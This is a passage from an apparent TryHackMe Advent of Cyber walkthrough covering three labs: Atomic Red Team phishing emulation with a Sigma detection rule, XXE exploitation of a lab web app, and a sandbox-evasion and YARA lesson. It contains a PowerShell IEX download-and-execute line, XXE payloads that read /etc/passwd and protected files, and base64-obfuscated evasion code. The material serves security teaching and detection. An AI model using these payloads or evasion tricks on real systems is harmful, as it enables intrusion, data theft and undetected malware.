-ShowDetailsBrief
Shows the title of each test included in the Atomic.
Invoke-AtomicTest T1566.001 -ShowDetailsBrief
-CheckPrereqs
Provides a check if all necessary components are present for testing
Invoke-AtomicTest T1566.001 -CheckPrereqs
-TestNames
Sets the tests you want to execute using the complete Atomic Test Name.
Invoke-AtomicTest T1566.001 -TestNames "Download Macro-Enabled Phishing
Attachment"
-TestGuids
Sets the tests you want to execute using the unique test identifier.
Invoke-AtomicTest T1566.001 -TestGuids 114ccff9-ae6d-4547-9ead-4cd69f687306
-TestNumbers
Sets the tests you want to execute using the test number. The scope is limited
to the Atomic Technique. Invoke-AtomicTest T1566.001 -TestNumbers 2,3
-Cleanup
Run the cleanup commands that were configured to revert your machine state to
normal.
Invoke-AtomicTest T1566.001 -TestNumbers 2 -Cleanup
Our First Command
We can build our first command now that we know which parameters are available.
We would like to know more about what exactly happens when we test the Technique
T1566.001. To get this information, we must include the name of the technique we
want information about and then add the flag -ShowDetails to our command. Let's
have a look at the command we constructed: Invoke-AtomicTest T1566.001
-ShowDetails. This command displays the details of all tests included in the
T1566.001 Atomic.
Atomic Test T1566.001 Details
PS C:\Users\Administrator> Invoke-AtomicTest T1566.001 -ShowDetails
PathToAtomicsFolder = C:\Tools\AtomicRedTeam\atomics
[********BEGIN TEST*******]
Technique: Phishing: Spearphishing Attachment T1566.001
Atomic Test Name: Download Macro-Enabled Phishing Attachment
Atomic Test Number: 1
Atomic Test GUID: 114ccff9-ae6d-4547-9ead-4cd69f687306
Description: This atomic test downloads a macro enabled document from the Atomic Red Team GitHub repository, simulating
an end user clicking a phishing link to download the file. The file "PhishingAttachment.xlsm" is downloaded to the %temp
% directory.
Attack Commands:
Executor: powershell
ElevationRequired: False
Command:
$url = 'http://localhost/PhishingAttachment.xlsm'
Invoke-WebRequest -Uri $url -OutFile $env:TEMP\PhishingAttachment.xlsm
Cleanup Commands:
Command:
Remove-Item $env:TEMP\PhishingAttachment.xlsm -ErrorAction Ignore
[!!!!!!!!END TEST!!!!!!!]
[********BEGIN TEST*******]
Technique: Phishing: Spearphishing Attachment T1566.001
Atomic Test Name: Word spawned a command shell and used an IP address in the command line
Atomic Test Number: 2
Atomic Test GUID: cbb6799a-425c-4f83-9194-5447a909d67f
Description: Word spawning a command prompt then running a command with an IP address in the command line is an indiciat
or of malicious activity. Upon execution, CMD will be lauchned and ping 8.8.8.8
Attack Commands:
Executor: powershell
ElevationRequired: False
Command:
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
$macrocode = " Open `"#{jse_path}`" For Output As #1`n Write #1, `"WScript.Quit`"`n Close #1`n Shell`$ `"ping 8.8.8.8`"`n"
Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}"
Command (with inputs):
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
$macrocode = " Open `"C:\Users\Public\art.jse`" For Output As #1`n Write #1, `"WScript.Quit`"`n Close #1`n Shell`$ `"ping 8.8.8.8`"`n"
Invoke-MalDoc -macroCode $macrocode -officeProduct "Word"
Cleanup Commands:
Command:
Remove-Item #{jse_path} -ErrorAction Ignore
Command (with inputs):
Remove-Item C:\Users\Public\art.jse -ErrorAction Ignore
Dependencies:
Description: Microsoft Word must be installed
Check Prereq Command:
try {
New-Object -COMObject "#{ms_product}.Application" | Out-Null
$process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"}
Stop-Process -Name $process
exit 0
} catch { exit 1 }
Check Prereq Command (with inputs):
try {
New-Object -COMObject "Word.Application" | Out-Null
$process = "Word"; if ( $process -eq "Word") {$process = "winword"}
Stop-Process -Name $process
exit 0
} catch { exit 1 }
Get Prereq Command:
Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement"
Get Prereq Command (with inputs):
Write-Host "You will need to install Microsoft Word manually to meet this requirement"
[!!!!!!!!END TEST!!!!!!!]
The output above is clearly split up into multiple parts, each matching a test.
Let's examine what type of information is provided in a test. We will use the
test we want to run as an example.
Key Value Description Technique Phishing: Spearphishing Attachment T1566.001 The
full name of the MITRE ATT&CK technique that will be tested Atomic Test Name
Download Macro-Enabled Phishing Attachment A descriptive name of the type of
test that will be executed Atomic Test Number 1 A number is assigned to the
test; we can use this in the command to specify which test we want to run.
Atomic Test GUID 114ccff9-ae6d-4547-9ead-4cd69f687306 A unique ID is assigned to
this test; we can use this in the command to specify which test we want to run.
Description This atomic test downloads a macro-enabled document from the Atomic
Red Team GitHub repository, simulating an end-user clicking a phishing link to
download the file. The file "PhishingAttachment.xlsm" is downloaded to the
%temp% directory. Provides a detailed explanation of what the test will do.
Attack commands
Executor: powershell
ElevationRequired: False
Command: $url = ‘http://localhost/PhishingAttachment.xlsm’ Invoke-WebRequest
-Uri $url -OutFile $env:TEMP.xlsm
This provides an overview of all the commands run during the test, including the
executor of those commands and the required privileges. It also helps us
determine where to look for artefacts in Windows Event Viewer. Cleanup commands
Command: Remove-Item $env:TEMP.xlsm -ErrorAction Ignore An overview of the
commands executed to revert the machine back to its original state. Dependencies
There are no dependencies required.
An overview of all required resources that must be present on the testing
machine in order to execute the test
Phishing: Spearphishing Attachment T1566.001 Emulated
Let's continue and run the first test of T1566.001. Before running the
emulation, we should ensure that all required resources are in place to conduct
it successfully. To verify this, we can add the flag -Checkprereq to our
command. The command should look something like this: Invoke-AtomicTest
T1566.001 -TestNumbers 1 -CheckPrereq.
This command will use the data included in the "dependencies" part of the test
details to verify if all required resources are present. Looking at the test 1
dependencies of the T1566.001 Atomic, no additional resources are required. Run
the same command for test 2, and it will state that Microsoft Word needs to be
installed, as shown below:
Administrator: Windows PowerShell
PS C:\Users\Administrator> Invoke-AtomicTest T1566.001 -TestNumbers 2 -CheckPrereq
PathToAtomicsFolder = C:\Tools\AtomicRedTeam\atomics
CheckPrereq's for: T1566.001-2 Word spawned a command shell and used an IP address in the command line
Prerequisites not met: T1566.001-2 Word spawned a command shell and used an IP address in the command line
[*] Microsoft Word must be installed
Try installing prereq's with the -GetPrereqs switch
Now that we have verified the dependencies, let us continue with the emulation.
Execute the following command to start the emulation: Invoke-AtomicTest
T1566.001 -TestNumbers 1 and you should get the following output:
Executing Atomic Test T1566.001
PS C:\Users\Administrator> Invoke-AtomicTest T1566.001 -TestNumbers 1
PathToAtomicsFolder = C:\Tools\AtomicRedTeam\atomics
Executing test: T1566.001-1 Download Macro-Enabled Phishing Attachment
Done executing test: T1566.001-1 Download Macro-Enabled Phishing Attachment
Based on the output, we can determine that the test was successfully executed.
We can now analyse the logs in theWindows Event Viewer to find Indicators of
Attack and Compromise.
DETECTING THE ATOMIC
Now that we have executed the T1566.001 Atomic, we can look for log entries that
point us to this emulated attack. For this purpose, we will use the Windows
Event Logs. This machine comes with Sysmon installed. System Monitor (Sysmon)
provides us with detailed information about process creation, network
connections, and changes to file creation time.
To make it easier for us to pick up the events created for this emulation, we
will first start with cleaning up files from the previous test by running the
command Invoke-AtomicTest T1566.001 -TestNumbers 1 -cleanup.
Administrator: Windows PowerShell
PS C:\Users\Administrator> Invoke-AtomicTest T1566.001 -TestNumbers 1 -cleanup
Now, we will clear the Sysmon event log:
* Open up Event Viewer by clicking the icon in the taskbar, or searching for it
in the Start Menu.
* Navigate to Applications and Services => Microsoft => Windows => Sysmon =>
Operational on the left-hand side of the screen.
* Right-click Operational on the left-hand side of the screen and click Clear
Log. Click Clear when the popup shows.
Now that we have cleaned up the files and the sysmon logs, let us run the
emulation again by issuing the command Invoke-AtomicTest T1566.001 -TestNumbers
1.
Administrator: Windows PowerShell
PS C:\Users\Administrator> Invoke-AtomicTest T1566.001 -TestNumbers 1
PathToAtomicsFolder = C:\Tools\AtomicRedTeam\atomics
Executing test: T1566.001-1 Download Macro-Enabled Phishing Attachment
Done executing test: T1566.001-1 Download Macro-Enabled Phishing Attachment
Next, go to the Event Viewer and right-click on the Operational log on the
left-hand side of the screen and then click on Refresh. There should be new
events related to the emulated attack. Now sort the table on the Date and Time
column to order the events chronologically (oldest first). The first two events
of the list are tests that Atomic executes for every emulation. We are
interested in 2 events that detail the attack:
* First, a process was created for PowerShell to execute the following command:
"powershell.exe" & {$url = 'http://localhost/PhishingAttachment.xlsm'
Invoke-WebRequest -Uri $url -OutFile $env:TEMP\PhishingAttachment.xlsm}.
* Then, a file was created with the name PhishingAttachment.xlsm.
Click on each event to see the details. When you select an event, you should see
a detailed overview of all the data collected for that event. Click on the
Details tab to show all the EventData in a readable format. Let us take a look
at the details of these events below. The data highlighted is valuable for
incident response and creating alerting rules.
Navigate to the directory C:\Users\Administrator\AppData\Local\Temp\, and open
the file PhishingAttachment.txt. The flag included is the answer to question 1.
Make sure to answer the question now, as the cleanup command will delete this
file.
Let's clean up the artefacts from our spearphishing emulation. Enter the command
Invoke-AtomicTest T1566.001-1 -cleanup.
Now that we know which artefacts were created during this spearphishing
emulation, we can use them to create custom alerting rules. In the next section,
we will explore this topic further.
ALERTING ON THE ATOMIC
In the previous paragraph, we found multiple indicators of compromise through
the Sysmon event log. We can use this information to create detection rules to
include in our EDR, SIEM, IDS, etc. These tools offer functionalities that allow
us to import custom detection rules. There are several detection rule formats,
including Yara, Sigma, Snort, and more. Let's look at how we can implement the
artefacts related to T1566.001 to create a custom Sigma rule.
Two events contained possible indicators of compromise. Let's focus on the event
that contained the Invoke-WebRequest command line:
"powershell.exe" & {$url = 'http://localhost/PhishingAttachment.xlsm'
Invoke-WebRequest -Uri $url -OutFile $env:TEMP\PhishingAttachment.xlsm}"
We can use multiple parts of this artefact to include in our custom Sigma rule.
* Invoke-WebRequest: It is not common for this command to run from a script
behind the scenes.
* $url = 'http://localhost/PhishingAttachment.xlsm': Attackers often use a
specific malicious domain to host their payloads. Including the malicious URL
in the Sigma rule could help us detect that specific URL.
* PhishingAttachment.xlsm: This is the malicious payload downloaded and saved
on our system. We can include its name in the Sigma rule as well.
Combining all these pieces of information in a Sigma rule would look something
like this:
PowerShell Invoke-WebRequest Sigma Rule
title: Detect PowerShell Invoke-WebRequest and File Creation of PhishingAttachment.xlsm
id: 1
description: Detects the usage of Invoke-WebRequest to download PhishingAttachment.xlsm and the creation of the file PhishingAttachment.xlsm.
status: experimental
author: TryHackMe
logsource:
category: process_creation
product: windows
service: sysmon
detection:
selection_invoke_webrequest:
EventID: 1
CommandLine|contains:
- 'Invoke-WebRequest'
- 'http://localhost/PhishingAttachment.xlsm'
selection_file_creation:
EventID: 11 # Sysmon Event ID for File Creation
TargetFilename|endswith: '\PhishingAttachment.xlsm'
condition: selection_invoke_webrequest or selection_file_creation
falsepositives:
- Legitimate administration activity may use Invoke-WebRequest, and legitimate Excel files may be created with similar names.
level: high
tags:
- attack.t1071.001 # Web Service - Application Layer Protocol
- attack.t1059.001 # PowerShell
- attack.t1105 # Ingress Tool Transfer
- attack.t1566.001 # Spearphishing Attachment
The detection part is where the effective detection is happening. We can see
clearly the artefacts that we discovered during the emulation test. We can then
import this rule into the main tools we use for alerts, such as the EDR, SIEM,
XDR, and many more.
Now that Glitch has shown us his intentions, let's continue with his work and
run an emulation for ransomware.
CHALLENGE
As Glitch continues to prepare for SOC-mas and fortifies Wareville's security,
he decides to conduct an attack simulation that would mimic a ransomware attack
across the environment. He is unsure of the correct detection metrics to
implement for this test and asks you for help. Your task is to identify the
correct atomic test to run that will take advantage of a command and scripting
interpreter, conduct the test, and extract valuable artefacts that would be used
to craft a detection rule.
Answer the questions below
What was the flag found in the .txt file that is found in the same directory as
the PhishingAttachment.xslm artefact?
Login to answer..Hint
What ATT&CK technique ID would be our point of interest?
Login to answer..Hint
What ATT&CK subtechnique ID focuses on the Windows Command Shell?
Login to answer..Hint
What is the name of the Atomic Test to be simulated?
Login to answer..Hint
What is the name of the file used in the test?
Login to answer..
What is the flag found from this Atomic Test?
Login to answer..Hint
Learn more about the Atomic Red Team via the linked room.
Login to answer..
Task 11 XXE Day 5: SOC-mas XX-what-ee?
Task includes a deployable machine
The Story
Click here to watch the walkthrough video!
The days in Wareville flew by, and Software's projects were nearly complete,
just in time for Christmas. One evening, after wrapping up work, Software was
strolling through the town when he came across a young boy looking dejected.
Curious, Software asked, "What would you like for Christmas?" The boy replied
with a sigh, "I wish for a teddy bear, but I know that my family can't afford
one."
This brief conversation sparked an idea in Software's mind—what if there was a
platform where everyone in town could share their Christmas wishes, and the
Mayor's office could help make them come true? Excited by the potential,
Software introduced the idea to Mayor Malware, who embraced it immediately. The
Mayor encouraged the team to build the platform for the people of Wareville.
Through the developers' dedication and effort, the platform was soon ready and
became an instant hit. The townspeople loved it! However, in their rush to meet
the holiday deadline, the team had overlooked something critical—thorough
security testing. Even Mayor Malware had chipped in to help develop a feature in
the final hours. Now, it's up to you to ensure the application is secure and
free of vulnerabilities. Can you guarantee the platform runs safely for the
people of Wareville?
Learning Objectives
* Understand the basic concepts related to XML
* Explore XML External Entity (XXE) and its components
* Learn how to exploit the vulnerability
* Understand remediation measures
Important Concepts
Extensible Markup Language (XML)
XML is a commonly used method to transport and store data in a structured format
that humans and machines can easily understand. Consider a scenario where two
computers need to communicate and share data. Both devices need to agree on a
common format for exchanging information. This agreement (format) is known as
XML. You can think of XML as a digital filing cabinet. Just as a filing cabinet
has folders with labelled documents inside, XML uses tags to label and organise
information. These tags are like folders that define the type of data stored.
This is what an XML looks like, a simple piece of text information organised in
a structured manner:
<people>
<name>Glitch</name>
<address>Wareville</address>
<email>glitch@wareville.com</email>
<phone>111000</phone>
</people>
In this case, the tags <people>, <name>, <address>, etc are like folders in a
filing cabinet, but now they store data about Glitch. The content inside the
tags, like "Glitch," "Wareville," and "123-4567" represents the actual data
being stored. Like before, the key benefit of XML is that it is easily shareable
and customisable, allowing you to create your own tags.
Document Type Definition (DTD)
Now that the two computers have agreed to share data in a common format, what
about the structure of the format? Here is when the DTD comes into play. A DTD
is a set of rules that defines the structure of an XML document. Just like a
database scheme, it acts like a blueprint, telling you what elements (tags) and
attributes are allowed in the XML file. Think of it as a guideline that ensures
the XML document follows a specific structure.
For example, if we want to ensure that an XML document about people will always
include a name, address, email, and phone number, we would define those rules
through a DTD as shown below:
<!DOCTYPE people [
<!ELEMENT people(name, address, email, phone)>
<!ELEMENT name (#PCDATA)>
<!ELEMENT address (#PCDATA)>
<!ELEMENT email (#PCDATA)>
<!ELEMENT phone (#PCDATA)>
]>
In the above DTD, <!ELEMENT> defines the elements (tags) that are allowed, like
name, address, email, and phone, whereas #PCDATA stands for parsed people data,
meaning it will consist of just plain text.
Entities
So far, both computers have agreed on the format, the structure of data, and the
type of data they will share. Entities in XML are placeholders that allow the
insertion of large chunks of data or referencing internal or external files.
They assist in making the XML file easy to manage, especially when the same data
is repeated multiple times. Entities can be defined internally within the XML
document or externally, referencing data from an outside source.
For example, an external entity references data from an external file or
resource. In the following code, the entity &ext; could refer to an external
file located at "http://tryhackme.com/robots.txt", which would be loaded into
the XML, if allowed by the system:
<!DOCTYPE people [
<!ENTITY ext SYSTEM "http://tryhackme.com/robots.txt">
]>
<people>
<name>Glitch</name>
<address>&ext;</address>
<email>glitch@wareville.com</email>
<phone>111000</phone>
</people>
We are specifically discussing external entities because it is one of the main
reasons that XXE is introduced if it is not properly managed.
XML External Entity (XXE)
After understanding XML and how entities work, we can now explore the XXE
vulnerability. XXE is an attack that takes advantage of how XML parsers handle
external entities. When a web application processes an XML file that contains an
external entity, the parser attempts to load or execute whatever resource the
entity points to. If necessary sanitisation is not in place, the attacker may
point the entity to any malicious source/code causing the undesired behaviour of
the web app.
For example, if a vulnerable XML parser processes this external entity
definition:
<!DOCTYPE people[
<!ENTITY thmFile SYSTEM "file:///etc/passwd">
]>
<people>
<name>Glitch</name>
<address>&thmFile;</address>
<email>glitch@wareville.com</email>
<phone>111000</phone>
</people>
Here, the entity &thmFile; refers to the sensitive file /etc/passwd on a system.
When the XML is processed, the parser will try to load and display the contents
of that file, exposing sensitive information to the attacker.
In the upcoming tasks, we will examine how XXE works and how to exploit it.
Connecting to the Machine
Before moving forward, review the questions in the connection card shown below:
Click on the green Start Machine button below to start the virtual
machine. While the virtual machine starts, click on the Start AttackBox button
at the top of the page and browse Wareville's WishVille application
at http://MACHINE_IP. Please wait 1-2 minutes after the system boots completely
to let the auto scripts run successfully.
Start Machine
Practical
Now that you understand the basic concepts related to XML and XXE, we will
analyse an application that allows users to view and add products to their carts
and perform the checkout activity. You can access the Wareville application
hosted on http://MACHINE_IP. This application allows users to request their
Christmas wishes.
Flow of the Application
As a penetration tester, it is important to first analyse the flow of the
application. First, the user will browse through the products and add items of
interest to their wishlist at http://MACHINE_IP/product.php. Click on the Add to
Wishlist under Wareville's Jolly Cap, as shown below:
After adding products to the wishlist, click the Cart button or visit
http://MACHINE_IP/cart.php to see the products added to the cart. On the
Cart page, click the Proceed to Checkout button to buy the items as shown below:
On the checkout page, the user will be prompted to enter his name and address as
shown below:
Enter any name of your choice and address, and click on Complete Checkout to
place the wish. Once you complete the wish, you will be shown the message
"Wish successful. Your wish has been saved as Wish #21", as shown below:
Wish #21 indicates the wishes placed by a user on the website. Once you click on
Wish #21, you will see a forbidden page because the details are only accessible
to admins. But can we try to bypass this and access other people's wishes? This
is what we will try to perform in this task.
Intercepting the Request
Before discussing exploiting XXE on the web, let's learn how to intercept the
request. First, we need to configure the environment so that, as a pentester,
all web traffic from our browser is routed through Burp Suite. This allows us to
see and manipulate the requests as we browse.
We will use Burp Suite, a powerful web vulnerability scanner, to intercept and
modify requests for this exploitation. You can access Burp Suite in the
AttackBox. On the desktop of the AttackBox, you will see a Burp Suite icon as
shown below:
Once you click the icon, Burp Suite will open with an introductory screen. You
will see a message like "Welcome to Burp Suite". Click on the Next button.
On the next screen, you will have the option to Start Burp. Click on the Start
Burp button to start the tool.
Once Burp Suite has started, you will see its main interface with different
tabs, such as Proxy, Intruder, Repeater and others.
Inside Burp Suite, click the Settings tab at the top right. You will see Burp's
browser option available under the Tools section. Enable Allow Burp's browser to
run without a sandbox option and click on the close icon on the top right corner
of the Settings tab as shown below:
After allowing the browser to run without a sandbox, we would now be able to
start the browser with pre-configured Burp Suite's proxy. Navigate to the Open
browser option located at the Proxy -> Intercept section of Burp. Open the
browser by clicking the Open browser as shown below and browse the
URL http://MACHINE_IP, so that all requests are intercepted:
Once you browse the URL, all the requests are intercepted and can be seen under
the Proxy->HTTP history tab.
What is Happening in the Backend?
Now, when you visit the URL, http://MACHINE_IP/product.php, and click Add to
Wishlist, an AJAX call is made to wishlist.php with the following XML as input.
<wishlist>
<user_id>1</user_id>
<item>
<product_id>1</product_id>
</item>
</wishlist>
In the above XML, <product_id> tag contains the ID of the product, which is 1 in
this case. Now, let's review the Add to Wishlist request logged in Burp Suite's
HTTP History option under the proxy tab. As discussed above, the request
contains XML being forwarded as a POST request, as shown below:
This wishlist.php accepts the request and parses the request using the following
code:
<?php
..
...
libxml_disable_entity_loader(false);
$wishlist = simplexml_load_string($xml_data, "SimpleXMLElement", LIBXML_NOENT);
...
..
echo "Item added to your wishlist successfully.";
?>
Preparing the Payload
When a user sends specially crafted XML data to the application, the line
libxml_disable_entity_loader(false) allows the XML parser to load external
entities. This means the XML input can include external file references or
requests to remote servers. When the XML is processed by simplexml_load_string
with the LIBXML_NOENT option, the web app resolves external entities, allowing
attackers access to sensitive files or allowing them to make unintended requests
from the server.
What if we update the XML request to include references for external entities?
We will use the following XML instead of the above XML:
<!--?xml version="1.0" ?-->
<!DOCTYPE foo [<!ENTITY payload SYSTEM "/etc/hosts"> ]>
<wishlist>
<user_id>1</user_id>
<item>
<product_id>&payload;</product_id>
</item>
</wishlist>
When we send this updated XML payload, the first two lines introduce an external
entity called payload. The line <!ENTITY payload SYSTEM "/etc/hosts"> tells the
XML parser to replace the &payload; reference with the contents of the file
/etc/hosts on the server. When the XML is processed, instead of a normal
product_id, the application will try to load and include the contents of the
file specified in the entity (/etc/hosts).
Exploitation
Now, let's perform the exploitation by repeating the request we captured
earlier. The Burp Suite tool has a feature known as Repeater that allows you to
send multiple HTTP requests. We will use this feature to duplicate our HTTP POST
request and send it multiple times to exploit the vulnerability. Right-click on
the wishlist.php POST request and click on Send to Repeater.
Now, switch to the Repeater tab, where you'll find the POST request that needs
to be modified. We will update the XML payload with the new data as shown below
and then send the modified request:
Place the mouse cursor inside the request in the Repeater tab in Burp Suite and
press Ctrl+V or paste the payload in the above-highlighted area.
When we clicked Send, the server processed the malicious XML payload, which
included the external entity reference to /etc/hosts. As a result, the
wishlist.php responded with the contents of the /etc/hosts file, leading to an
XXE vulnerability.
Time for Some Action
Now that you've identified a vulnerability in the application, it's time to see
it in action! McSkidy Software has tasked us with finding loopholes, and we've
successfully uncovered one in the wishlist.php endpoint. But our work doesn't
end there—let's take it a step further and assess the potential impact this
vulnerability could have on the application.
Earlier, we discovered a page accessible only by administrators, which seems
like an exciting target. What if we could use the vulnerability we've found to
access sensitive information, like the wishes placed by the townspeople?
Now that our objective is clear, let's leverage the vulnerability we discovered
to read the contents of each wishes page and demonstrate the full extent of this
flaw to help McSkidy secure the platform. To get started, let's recall the page
that is only accessible by admins - /wishes/wish_1.txt. Using this path, we just
need to guess the potential absolute path of the file. Typically, web
applications are hosted on /var/www/html. With that in mind, let's build our new
payload to read the wishes while leveraging the vulnerability.
Note: Not all web applications use the path /var/www/html, but web servers
typically use it.
<!--?xml version="1.0" ?-->
<!DOCTYPE foo [<!ENTITY payload SYSTEM "/var/www/html/wishes/wish_1.txt"> ]>
<wishlist>
<user_id>1</user_id>
<item>
<product_id>&payload;</product_id>
</item>
</wishlist>
Surprisingly, we got lucky that our assumption worked. The next thing to do is
see whether we can view more wishes using our discovery. To do this, let's try
replacing the wish_1.txt with wish_2.txt.
As a result, we were able to view the next wish. You may observe that we just
incremented the number by one. Given this, you may continue checking the other
wishes and see all the wishes stored in the application.
After iterating through the wishes, we have proved the potential impact of the
vulnerability, and anyone who leverages this could read the wishes submitted by
the townspeople of Wareville.
Conclusion
It was confirmed that the application was vulnerable, and the developers were
not at fault since they only wanted to give the townspeople something before
Christmas. However, it became evident that bypassing security testing led to an
application that did not securely handle incoming requests.
As soon as the vulnerability was discovered, McSkidy promptly coordinated with
the developers to implement the necessary mitigations. The following proactive
approach helped to address the potential risks against XXE attacks:
* Disable External Entity Loading: The primary fix is to disable external
entity loading in your XML parser. In PHP, for example, you can prevent XXE
by setting libxml_disable_entity_loader(true) before processing the XML.
* Validate and Sanitise User Input: Always validate and sanitise the XML input
received from users. This ensures that only expected data is processed,
reducing the risk of malicious content being included in the request. For
example, remove suspicious keywords like /etc/host, /etc/passwd, etc, from
the request.
After discovering the vulnerability, McSkidy immediately remembered that a
CHANGELOG file exists within the web application, stored at the following
endpoint: http://MACHINE_IP/CHANGELOG. After checking, it can be seen that
someone pushed the vulnerable code within the application after Software's team.
With this discovery, McSkidy still couldn't confirm whether the Mayor
intentionally made the application vulnerable. However, the Mayor had already
become suspicious, and McSkidy began to formulate theories about his possible
involvement.
Answer the questions below
What is the flag discovered after navigating through the wishes?
Login to answer..Hint
What is the flag seen on the possible proof of sabotage?
Login to answer..
If you want to learn more about the XXE injection attack, check out
the XXE room!
Login to answer..
Following McSkidy's advice, Software recently hardened the server. It used to
have many unneeded open ports, but not anymore. Not that this matters in any
way.
Login to answer..
Task 12 Sandboxes Day 6: If I can't find a nice malware to use, I'm not going.
Task includes a deployable machine
Click here to watch the walkthrough video!
Mayor Malware was scheming, quite full of delight,
To ruin SOC-mas and frighten SOC teams.
But Glitch and McSkidy had spoiled his plan,
By uncovering secrets that exposed the man!
Mayor Malware slammed his hand on the table, his eyes narrowing as the report
flashed on his screen. Glitch and McSkidy had uncovered his trail. He took a
deep breath, calming himself. "No matter," he muttered, a sinister grin forming.
"They may have found me but haven't stopped me." His confidence stemmed from the
malware he had crafted—so devious and advanced that it would easily evade
detection.
But before unleashing it to wreak havoc on SOC teams and ruin SOC-mas, there was
one final step. He needed to test it in a sandbox.
LEARNING OBJECTIVES
* Analyze malware behaviour using sandbox tools.
* Explore how to use YARA rules to detect malicious patterns.
* Learn about various malware evasion techniques.
* Implement an evasion technique to bypass YARA rule detection.
CONNECTING TO THE MACHINE
Before moving forward, review the questions in the connection card shown below:
Click on the green Start Machine Button below to start the virtual machine in
split-screen view.
Start Machine
If the VM is not visible, use the blue Show Split View button at the top of the
page. Alternatively, you can connect to the VM via Remote Desktop (RDP) using
the credentials below:
Usernameadministrator PasswordTryH@cKMe9#21 IPMACHINE_IP
He slipped his malware into a sandbox to see,
What tricks it could play and what flaws there might be.
For sandboxes, you see, are used by the wise,
Defenders inspect, but attackers revise!
DETECTING SANDBOXES
A sandbox is an isolated environment where (malicious) code is executed without
affecting anything outside the system. Often, multiple tools are installed to
monitor, record, and analyze the code's behaviour.
Mayor Malware knows that before his malware executes, it needs to check if it is
running on a Sandbox environment. If it is, then it should not continue with its
malicious activity.
To do so, he has settled on one technique, which checks if the directory
C:\Program Files is present by querying the Registry path
HKLM\\Software\\Microsoft\\Windows\\CurrentVersion. The value can be confirmed
by visiting the Registry path within the Registry Editor, as shown below:
To open the Windows Registry Editor, navigate to the Start Menu on the bottom,
select Run, enter regedit, and press enter.
This directory is often absent on sandboxes or other virtualized environments,
which could indicate that the malware is running in a sandbox.
Here's what it looks like in the C Programming Language:
void registryCheck() {
const char *registryPath = "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion";
const char *valueName = "ProgramFilesDir";
// Prepare the command string for reg.exe
char command[512];
snprintf(command, sizeof(command), "reg query \"%s\" /v %s", registryPath, valueName);
// Run the command
int result = system(command);
// Check for successful execution
if (result == 0) {
printf("Registry query executed successfully.\n");
} else {
fprintf(stderr, "Failed to execute registry query.\n");
}
}
int main() {
const char *flag = "[REDACTED]";
registryCheck();
return 0;
}
Don't worry—you don't have to understand every detail of the code. All you need
to know is that this function is designed to check the system's registry for a
specified directory path (ProgramFilesDir). This path's presence or absence
helps the malware determine whether it's running in a typical or virtualized
environment,like a sandbox.
CAN YARA DO IT?
Mayor Malware knows that McSkidy is a big fan of YARA rules.
YARA is a tool used to identify and classify malware based on patterns in its
code. By writing custom rules, analysts can define specific characteristics to
look for—such as particular strings, file headers, or behaviours—and YARA will
scan files or processes to find matches, making it invaluable for detecting
malicious code.
Mayor Malware does not think such a simple tool can detect his malware. But just
to be sure, he has to test it out himself.
To do this, he wrote a small script that executes a YARA detection rule every
time a new event is added to the System monitor log. This particular YARA rule
detects any command that tries to access the registry.
Let's have a look at the rule:
rule SANDBOXDETECTED
{
meta:
description = "Detects the sandbox by querying the registry key for Program Path"
author = "TryHackMe"
date = "2024-10-08"
version = "1.1"
strings:
$cmd= "Software\\Microsoft\\Windows\\CurrentVersion\" /v ProgramFilesDir" nocase
condition:
$cmd
}
Let's understand the contents:
* In the strings section, we have defined variables that include the value to
look out for: $cmd
* In the condition section, we define when the rule will match the scanned
file. In this case, if any of the specified strings are present.
For his testing, Mayor Malware has set up a one-function script that runs the
Yara rule and logs a true positive in C:\Tools\YaraMatches.txt.
Open up a PowerShell window, navigate to the C:\Tools directory, and use the
following command to start up the EDR:
Administrator: Windows PowerShell
PS C:\Tools> .\JingleBells.ps1
No events found in Sysmon log.
Monitoring Sysmon events... Press Ctrl+C to exit.
This tool will run on the system and continuously monitor the generated Event
Logs. It will alert you if it finds any activity/event that indicates the
registry mentioned above key is being queried.
Now run the malware by navigating to C:\Tools\Malware, and double-clicking on
MerryChristmas.exe.
If our custom script did its job, you should have witnessed a popup by our EDR
with a flag included, as shown below. This will be the answer to Question 1
below. You can now exit the custom EDR by pressing Ctrl+C.
Note: If the popup does not show up, hover over the PowerShell item in the
taskbar. It should show the popup that was generated.
ADDING MORE EVASION TECHNIQUES
Ah, it seems that Yara can detect the evasion that Mayor Malware has added. No
worries. Because we can make our malware even stealthier by introducing
obfuscation.
void registryCheck() {
// Encoded PowerShell command to query the registry
const char *encodedCommand = "RwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AUABhAHQAaAAgACIASABLAEwATQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuACIAIAAtAE4AYQBtAGUAIABQAHIAbwBnAHIAYQBtAEYAaQBsAGUAcwBEAGkAcgA=";
// Prepare the PowerShell execution command
char command[512];
snprintf(command, sizeof(command), "powershell -EncodedCommand %s", encodedCommand);
// Run the command
int result = system(command);
// Check for successful execution
if (result == 0) {
printf("Registry query executed successfully.\n");
} else {
fprintf(stderr, "Failed to execute registry query.\n");
}
}
Code Explanation
The above code does the same thing: query the same registry key to get the
information about the Program Data. The only difference is that the query is now
encoded using base64, and the code uses the PowerShell to execute the query. The
encoded string can be checked by decoding it using a tool like CyberChef, as
shown below:
BEWARE OF FLOSS
While obfuscation is helpful, we also need to know that there are tools
available that extract obfuscated strings from malware binaries. One such tool
is Floss, a powerful tool developed by Mandiant that functions similarly to the
Linux strings tool but is optimized for malware analysis, making it ideal for
revealing any concealed details.
To try out Floss, open a PowerShell Window and enter the following command:
Administrator: Windows Powershell
PS C:\Tools\FLOSS> floss.exe C:\Tools\Malware\MerryChristmas.exe |Out-file C:\tools\malstrings.txt
The above command can take up to two minutes to complete. In the meantime, let's
break down the command:
* floss.exe C:\Tools\Malware\MerryChristmas.exe: This command scans for strings
in the binary MerryChrismas.exe. If any hardcoded variables were defined in
